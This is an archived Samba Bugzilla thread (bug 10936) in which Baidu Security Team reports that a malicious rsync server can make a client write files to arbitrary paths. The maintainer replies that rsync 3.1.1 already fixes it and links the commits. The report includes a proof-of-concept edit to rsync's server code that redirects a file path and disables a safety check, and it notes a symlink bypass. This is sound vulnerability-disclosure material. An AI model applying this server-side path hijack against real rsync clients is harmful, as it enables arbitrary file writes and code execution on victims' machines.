samba-bugs at samba.org
2014-Nov-14 06:51 UTC
[Bug 10936] New: Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936 Bug ID: 10936 Summary: Rsync path hijacking attack vulnerability Product: rsync Version: 3.1.1 Hardware: All OS: All Status: NEW Severity: critical Priority: P5 Component: core Assignee: wayned at samba.org Reporter: gaojianfeng at baidu.com QA Contact: rsync-qa at samba.org Created attachment 10433 --> https://bugzilla.samba.org/attachment.cgi?id=10433&action=edit Rsync path hijacking attack vulnerability.pdf (Detailed documentation) Hi all: In newest version rsync,Baidu Security Team found a vulnerability which is similar to wget ftp CVE-2014-4877 (http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4877).When a clientuses parameter -a to synchronize files of the server-side(default), for example: rsync -avzP 127.0.0.1::share /tmp/share Rsync recursive synchronous all files,An attacker can hijack the file path by modifying the code of the server-side,allows remote servers to write to arbitrary files, and consequently execute arbitrary code . Vulnerability Details : First I shared in the Rsync folder to write the following documents [root at pentest rsync]# ls -lh total 8.0K -rw-r--r-- 1 root root 2 Oct 31 03:16 1.txt drwxr-xr-x 2 root root 4.0K Oct 31 05:17 truedir [root at pentest rsync]# cd truedir/ [root at pentest truedir]# ls pwned [root at pentest truedir]# cat pwned rsync test [root at pentest truedir]# Next I modify the server to send the file code,in the process of synchronizing,the path of file "pwned" can be blocked and changed into any path . file: flist.c line:394 static void send_file_entry(int f, const char *fname, struct file_struct *file, #ifdef SUPPORT_LINKS const char *symlink_name, int symlink_len, #endif int ndx, int first_ndx) { if(strcmp(fname,"turedir/pwned") == 0){ fname="/root/pwned.test"; //Arbitrarily path } Then, verification occurs in the server-side and says ?received request to transfer non-regular file /root/pwned.test 7 [sender]?,But as an attacker, the code of the server-side can be arbitrarily controlled,Shielding the following code. file:rsync.c line:405? /* if (iflags & ITEM_TRANSFER) { int i = ndx - cur_flist->ndx_start; if (i < 0 || !S_ISREG(cur_flist->files[i]->mode)) { rprintf(FERROR, "received request to transfer non-regular file: %d [%s]\n", ndx, who_am_i()); exit_cleanup(RERR_PROTOCOL); } } */ The file "pwned" will be downloaded into forged path(/root/pwned.test). -- You are receiving this mail because: You are the QA Contact for the bug.
samba-bugs at samba.org
2014-Nov-14 23:24 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936 --- Comment #1 from roland <devzero at web.de> --- in other words - a malicious rsync server can force a client to create any file in any path, as long as the client can write to that path ? indeed, interesting find - and a security bug then. -- You are receiving this mail because: You are the QA Contact for the bug.
samba-bugs at samba.org
2014-Nov-17 03:01 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936 --- Comment #2 from gaojianfeng <gaojianfeng at baidu.com> --- (In reply to roland from comment #1) yes -- You are receiving this mail because: You are the QA Contact for the bug.
samba-bugs at samba.org
2014-Nov-27 19:29 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936 Wayne Davison <wayned at samba.org> changed: What |Removed |Added ---------------------------------------------------------------------------- Resolution|--- |FIXED Status|NEW |RESOLVED --- Comment #3 from Wayne Davison <wayned at samba.org> --- In your test, you didn't use 3.1.1 on the client side. This was fixed in that release: ABORTING due to unsafe pathname from sender: /root/pwned.test -- You are receiving this mail because: You are the QA Contact for the bug.
samba-bugs at samba.org
2014-Nov-27 20:01 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936 --- Comment #4 from roland <devzero at web.de> --- that fix is this two commits, correct ? https://git.samba.org/?p=rsync.git;a=commit;h=371242e4e8150d4f9cc74cdf2d75d8250535175e https://git.samba.org/?p=rsync.git;a=commit; h=4cad402ea8a91031f86c53961d78bb7f4f174790 -- You are receiving this mail because: You are the QA Contact for the bug.
samba-bugs at samba.org
2014-Nov-27 20:10 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936 --- Comment #5 from Wayne Davison <wayned at samba.org> --- (In reply to roland from comment #4) Yes, those are the commits for this bug. -- You are receiving this mail because: You are the QA Contact for the bug.
samba-bugs at samba.org
2014-Dec-01 07:16 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936 --- Comment #6 from gaojianfeng <gaojianfeng at baidu.com> --- (In reply to Wayne Davison from comment #3) yes ! In newest version rsync(3.1.1),directly modify the file path into absolute path is not hijack succeed due to the security checks,but using symbolic links still can bypass security checks and spoofing client. A new bug I submitted :https://bugzilla.samba.org/show_bug.cgi?id=10977 -- You are receiving this mail because: You are the QA Contact for the bug.
Possibly Parallel Threads
- [Bug 10977] New: Rsync path spoofing attack vulnerability (rsync 3.1.1 tested)
- [PATCH] Unsnarl missing_below/dry_run logic.
- [patch] Replace illegal characters in filenames for FAT (switch)
- about .dovecot.sieve file can't found for directory
- about rsyncing of block devices